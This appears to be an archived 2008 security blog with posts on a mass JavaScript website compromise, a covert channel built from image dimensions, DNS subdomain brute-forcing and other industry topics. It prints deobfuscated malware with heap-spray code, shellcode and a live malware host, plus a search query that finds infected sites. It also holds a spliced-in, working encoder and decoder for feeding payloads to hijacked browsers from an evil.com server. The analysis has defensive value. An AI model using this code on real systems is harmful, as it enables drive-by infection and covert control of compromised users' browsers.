The New School of Information Security

Topic: Technology
8:03 am EDT, Mar 17, 2008
Why is information security so dysfunctional? Are you wasting the money you spend on security? This book shows how to spend it more effectively. How can you make more effective security decisions? This book explains why professionals have taken to studying economics, not cryptography--and why you should, too. And why security breach notices are the best thing to ever happen to information security. It's about time someone asked the biggest, toughest questions about information security. Security experts Adam Shostack and Andrew Stewart don't just answer those questions--they offer honest, deeply troubling answers. They explain why these critical problems exist and how to solve them. Drawing on powerful lessons from economics and other disciplines, Shostack and Stewart offer a new way forward. In clear and engaging prose, they shed new light on the critical challenges that are faced by the security field. Whether you're a CIO, IT manager, or security specialist, this book will open your eyes to new ways of thinking about--and overcoming--your most pressing security challenges. The New School enables you to take control, while others struggle with non-stop crises.

Go Adam! Congrats on getting this out the door! We can exchange signed copies at RSA.

JavaScript from Mass Compromise

Topic: Technology
2:19 pm EDT, Mar 13, 2008
McAfee is talking about a massive website compromise that's using JavaScript to drop malware. The attacker(s) is injecting tags into the title of the pages. McAfee researchers are jackholes who don't want to share the wealth and thus don't provide any links or insight into the code. However, based on the vector the attackers are using (injecting into the <title> tag), the simple Google query intitle:"<script src=http" will show you the sites that are infected and where you can fetch the code. Some of the websites serving the malware require you to spoof a Referer header to receive the actual malware. Here is one example after a pass through a JavaScript analyzer:

http://b.njnk.net:80/E/J.JS
// Configuration and flags as extracted by the analyzer. The string splitting
// ("use" + "rid1" + ...) is a cheap trick to dodge signature matching.
var z1IlbQFl0X = 0;
var z1IlaxFl0X = 0;
var z1IlbPFl0X = 1;
var z1IlbiFl0X = 0;
var z1IlbCFl0X = 0;
var z1IlbHFl0X = 0;
var z1IlbIFl0X = 0;
var z1IlbfFl0X = "use" + "rid1" + "AF9122";  // cookie name: userid1AF9122
var z1IlbcFl0X = "20";
var z1IlaoFl0X = "a.n" + "jnk." + "net";    // second-stage host: a.njnk.net
var z1IlbGFl0X = 0, z1IlbzFl0X = 0, z1IlaHFl0X = 0;
var z1IlaAFl0X = "";
var z1IlanFl0X = 0;
var z1IlapFl0X = 0, z1IlaOFl0X = 0, z1IlaKFl0X = 0, z1IlaLFl0X = 0;
var z1IlamFl0X = "n" + "one";
var z1IlcqFl0X;
var z1IlaSFl0X = 0;
// Leftover debug output; dead code, since z1IlbQFl0X is 0 (z1IlcFFl0X is not defined in this fragment).
{
if(z1IlbQFl0X) {
document.getElementsByTagName("bod" + "y")[0].innerHTML += z1IlcFFl0X + "<b" + "r>";
}
}
{
if(z1IlbQFl0X) {
alert(z1IlcFFl0X);
}
}
// Cookie reader: returns the value stored under `name`, or null if absent.
function x0r1aU2Z(name) {
var z1IlaFFl0X = document.cookie;
var z1IlaJFl0X = name + "=";
if(! z1IlaFFl0X) {
return null;
}
var z1IlaDFl0X = z1IlaFFl0X.indexOf("; " + z1IlaJFl0X);
if(z1IlaDFl0X == -1) {
z1IlaDFl0X = z1IlaFFl0X.indexOf(z1IlaJFl0X);
if(z1IlaDFl0X != 0) {
return null;
}
}
else {
z1IlaDFl0X += 2;
}
var z1IlbqFl0X = document.cookie.indexOf(";", z1IlaDFl0X);
if(z1IlbqFl0X == -1) {
z1IlbqFl0X = z1IlaFFl0X.length;
}
return unescape(z1IlaFFl0X.substring(z1IlaDFl0X + z1IlaJFl0X.length, z1IlbqFl0X));
};
// Cookie writer: stores name=value with a one-year expiry. Paired with the reader
// above this is typically the "this browser has already been served" marker.
function x0r1aR2Z(name, value) {
var exp = new Date();
var z1IlbVFl0X = exp.getTime() + (365 * 1 * 24 * 60 * 60 * 1000);
exp.setTime(z1IlbVFl0X);
var z1IlbYFl0X = name + "=" + escape(value) + "; e" + "xpires" + "=" + exp.toGMTString();
document.cookie = z1IlbYFl0X;
};
// Heap-spray padding: doubles the string until it covers z1IlalFl0X bytes
// (the * 2 and / 2 account for JavaScript's two-byte characters).
function x0r1ax2Z(z1IlakFl0X, z1IlalFl0X) {
while(z1IlakFl0X.length * 2 < z1IlalFl0X) {
z1IlakFl0X += z1IlakFl0X;
}
z1IlakFl0X = z1IlakFl0X.substring(0, z1IlalFl0X / 2);
return z1IlakFl0X;
};
// Exploit entry point. 0x0c0c0c0c is the classic heap-spray landing address and
// z1IlarFl0X is the %u-encoded shellcode; the capture is truncated from here on.
function z1IltFl0X() {
if(z1IlaSFl0X > 0) {
return;
}
try {
var z1IlbaFl0X = 0x0c0c0c0c;
var z1IlarFl0X = unescape("%" + "ueb55㍮%" + "u64c" + ... [ Read More (3.0k in body) ]

Topic: Technology
4:55 pm EST, Mar 3, 2008
DOMTree.cs Line 84:
/// <summary>
/// recursive helper
/// </summary>
/// <param name="curr">curr DOM tree node</param>
/// <param name="token">Reflection Token</param>
/// <param name="locs">list of current reflections</param>
private void FindTokens(XmlNode curr, string token, ref List<ReflectedLocation> locs, string origParamVal) {
...
if(i <= 0 )
{
//HANDLE CRAP HERE, which I should do, but I don't.
//This is bad. Billy is a slacker.
}
...
}

Replacing people with RSS feeds

Topic: Technology
10:51 pm EST, Feb 28, 2008
I've worked with someone in biz-dev for a while who essentially interfaces with certain large companies and keeps senior management and research up to date on things those companies are working on that impact us. There has been a slow and steady decline in the quality of these reports over the last year or so, to the point that this person is literally forwarding me items directly from the companies' RSS feeds. ... [sigh] ... So, I conducted an experiment where I subscribed to 3 RSS feeds and killfiled the biz-dev guy. The result? I'm actually receiving *more* up-to-date info than he was providing because I don't have the lag time while he reformats other people's content into Digest-of-Company-X emails. Granted, I'm missing his commentary, but that's a trade-off I'm comfortable with. Maybe that makes me rude, but I found a way to save the company $80k a year. Go figure.

Lesbians... thats between Tab and Capslock right?

Topic: Technology
4:10 pm EST, Feb 22, 2008
If you haven't heard about the Optimus Maximus keyboard yet, you are missing out. Looking at screenshots of it over at Engadget I couldn't help but notice this picture: Unless my eyes deceive me, that's a picture of the Russian lesbians from the band Tatu. Why they are mapped to a keyboard key is an interesting question. But that's not half as interesting as what happens if you push that button.

Subdomain bruting and you!

Topic: Technology
10:41 am EST, Feb 19, 2008
Old timers here will know about the concept of bruteforcing DNS using the clues available, i.e. zone transfers are disabled, but you see that the NS and MX servers are called gandalf.company.com and elrond.company.com. Effectively, trying frodo.company.com is going to make good sense. To this end BidiBlah will do this automagically for you and tries to eke out info (a little while back I saw fierce-scanner pop up in a similar vein!). Young Mr Wilkinson ran up against a company last night with disabled transfers, but the 2 DNS servers showed up as:

* asimov.company.com
* heinlein.company.com

A quick trip to Wikipedia shows that both are American sci-fi authors.
Very cool! A DNS bruter using Wikipedia/Google to attempt to find relationships between subdomains. Bruting is fairly straightforward, and the trick has always been which values you should try. I faced this challenge about a month ago when I wrote a DNS bruter. Over the last 3 years or so I've made something of a hobby of collecting massive sets of URLs. At last count I had just under 90 million. I mined these and created a list of the 1000 most common subdomains. Not as sexy as BidiBlah, but effective.

Using Image Dimensions as a side channel

Topic: Technology
1:16 pm EST, Feb 14, 2008
Arshan over at Aspect posted something that sounds very familiar indeed over on his blog.

Disclaimer: I know this isn't earth-shattering now when the sandbox isn't there, but I think it's cool that using image tags we can create a completely covert channel for bypassing the same origin policy and control browsers remotely. Just to be clear, this is not a traditional same-origin bypass where we're on http://evil.com/ and we're talking to http://mybank.com/. We're talking about a hijacked client who's in collusion with an evil server that wants to deliver the client some message, be it a code payload, instructions, etc. Can we restrict JavaScript from dynamically loading image tags? No more image pre-loading? I doubt it! Here's how it works.

* Client dynamically creates an Image() and points the source to http://evil.com/evil.cgi?password=somesecret
* Server responds with an image that is 16 pixels tall and 1 pixel wide (16 represents in this phase the total length of the payload)
* Client then starts a loop that iterates 16/2 times:
  o Client dynamically creates a new Image() and points the source to http://evil.com/evil.cgi?password=somesecret&i=
  o The new image has height x, width y
  o Client appends the ASCII character with value x onto the payload string
  o Client appends the ASCII character with value y onto the payload string
* Client now has an authenticated, 16-length payload to do whatever they want with
Hehe. I was wondering when someone would talk about this! John Terrill and I looked at this back in late 2006, early 2007 and took this a little further than Arshan did. Here is what we came up with: The carrying capacity of a side channel is an important factor. Arshan's solution is not very good because of the limited capacity. How can we use dimensions as a side channel and not have to send tens of kilobytes to transfer a few bytes of data in the side channel? That's the "$1,000,000 and a Monster Truck" question which started John and I researching. Let's take GIF images. According to the spec, length and width are 16-bit integers, giving us 4 bytes of data. However, if I need to send 0xFFFFFFFF it would suck to have to transmit an image that is 65535x65535. That would be huge. But GIFs are compressed, right? Remember that JavaScript cannot access pixel data of the Image objects it creates, so we really don't care about what's in this picture. What if we make it all white? That should compress well. While it does, you are still sending ... [ Read More (0.5k in body) ]
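An added example that is not Arshan's code nor the poster's: both ends of the dimension channel in one file. The server side emits a fixed 35-byte GIF whose logical-screen width and height carry the data, which shows why the declared size costs nothing on the wire, and the client side reads those two 16-bit fields back (in a browser that is what Image.width/Image.height expose after onload; here a Node parser reads the header directly, which is an assumption about browser behaviour, not something the post states). It goes one step past the post's "4 bytes per image" by carrying 15 bits per field with a +1 offset, because a width or height of 0 is not a valid image and so the raw 16-bit value 0x0000 could never be sent. The first image announces the payload length in its width, as in Arshan's scheme; the payload bytes used in the usage and test are constructed.

```javascript
// Added example, not from the post: a GIF-dimension side channel, encoder and decoder.
const BITS_PER_FIELD = 15; // field value + 1 is stored, so a dimension is never the invalid 0

// Minimal valid GIF89a: logical screen width x height, a 2-entry colour table,
// one 1x1 image (LZW codes: clear, pixel 0, end) and the trailer. The declared
// screen size does not change the byte count, which is the point of the channel.
function gifWithDimensions(width, height) {
  for (const d of [width, height]) {
    if (!Number.isInteger(d) || d < 1 || d > 0xffff) throw new RangeError(`bad dimension ${d}`);
  }
  const buf = Buffer.alloc(35);
  buf.write('GIF89a', 0, 'ascii');
  buf.writeUInt16LE(width, 6);
  buf.writeUInt16LE(height, 8);
  buf[10] = 0x80;                            // global colour table present, 2 entries
  buf.set([0, 0, 0, 0xff, 0xff, 0xff], 13);  // palette: black, white
  buf[19] = 0x2c;                            // image descriptor at (0,0), 1x1
  buf.writeUInt16LE(1, 24);
  buf.writeUInt16LE(1, 26);
  buf[29] = 2;                               // LZW minimum code size
  buf.set([2, 0x44, 0x01, 0], 30);           // one 2-byte data sub-block, then terminator
  buf[34] = 0x3b;                            // trailer
  return buf;
}

// What the "browser" sees: the two 16-bit little-endian fields after the magic.
function gifDimensions(buf) {
  const magic = buf.toString('ascii', 0, 6);
  if (magic !== 'GIF89a' && magic !== 'GIF87a') throw new Error('not a GIF');
  return { width: buf.readUInt16LE(6), height: buf.readUInt16LE(8) };
}

function bytesToBits(bytes) {
  const bits = [];
  for (const b of bytes) for (let i = 7; i >= 0; i--) bits.push((b >> i) & 1);
  return bits;
}

function bitsToBytes(bits) {
  const out = [];
  for (let i = 0; i + 8 <= bits.length; i += 8) {
    let v = 0;
    for (let j = 0; j < 8; j++) v = (v << 1) | bits[i + j];
    out.push(v);
  }
  return Buffer.from(out);
}

// Server side: first image announces the byte length in its width; every
// further image carries 30 bits, 15 in the width and 15 in the height.
function encodePayload(payload) {
  const bytes = Buffer.from(payload);
  if (bytes.length < 1 || bytes.length > 0xffff) throw new RangeError('payload length must fit in 16 bits');
  const bits = bytesToBits(bytes);
  const fields = [];
  for (let i = 0; i < bits.length; i += BITS_PER_FIELD) {
    let v = 0;
    for (let j = 0; j < BITS_PER_FIELD; j++) v = (v << 1) | (bits[i + j] || 0); // zero-pad the tail
    fields.push(v + 1);
  }
  if (fields.length % 2) fields.push(1); // pad to a whole image
  const images = [gifWithDimensions(bytes.length, 1)];
  for (let i = 0; i < fields.length; i += 2) images.push(gifWithDimensions(fields[i], fields[i + 1]));
  return images;
}

// Client side: recover the bytes from the dimensions alone, no pixel access needed.
function decodePayload(images) {
  const length = gifDimensions(images[0]).width;
  const bits = [];
  for (const img of images.slice(1)) {
    const { width, height } = gifDimensions(img);
    for (const v of [width - 1, height - 1]) {
      for (let i = BITS_PER_FIELD - 1; i >= 0; i--) bits.push((v >> i) & 1);
    }
  }
  return bitsToBytes(bits.slice(0, length * 8));
}

// Images (and therefore HTTP round trips) needed for n payload bytes.
function imagesNeeded(n) {
  return 1 + Math.ceil((8 * n) / (2 * BITS_PER_FIELD));
}
```

Usage: on the server, serve encodePayload(secret)[i] for the i-th request; in the browser, create one Image per index, collect width and height in onload, and feed the pairs to the same decoding loop. At 35 bytes per image and 30 payload bits per round trip the cost is roughly 9 bytes of image per payload byte plus HTTP overhead, versus 2 payload bytes per image in the original scheme.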

'SideJacking' is fucking retarded.

Topic: Technology
4:05 pm EST, Feb 4, 2008
[sigh] ... This whole "SideJacking" meme is especially annoying and amusing to me. I've had people contact me (neither Robert nor Dave, mainly reporters and non-web infosec guys) asking my opinion on this dangerous attack. These are the same people who have also said to me in the past that XSS isn't interesting because it's just cookie theft and that's not very sexy. ... SIDE JACKING IS COOKIE THEFT YOU JACKASS! [SMACK] Why the hell are we still talking about this?

Topic: Technology
2:49 pm EST, Jan 31, 2008
Apparently Symantec thinks Jikto is a virus. Odd that it doesn't care about Samy, Zanga, Adultspace, MySpace+Quicktime, XSS-Proxy, JS/Wonka, JS/Random, or the 15 other pieces of JavaScript malware I have on my box. In fact, Yamanner is the only other thing I have to store in ROT13 to prevent the AV from eating it. I wonder if DOMinatrix is next.

Topic: Technology
10:30 pm EST, Jan 27, 2008
GET / HTTP/1.0
Host: blog.oreilly.com

HTTP/1.1 301 Moved Permanently
Date: Mon, 28 Jan 2008 03:26:19 GMT
Server: Apache
Location: http://blogs.oreilly.comdev/
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 305

comdev? WTF? Perhaps an internal staging server?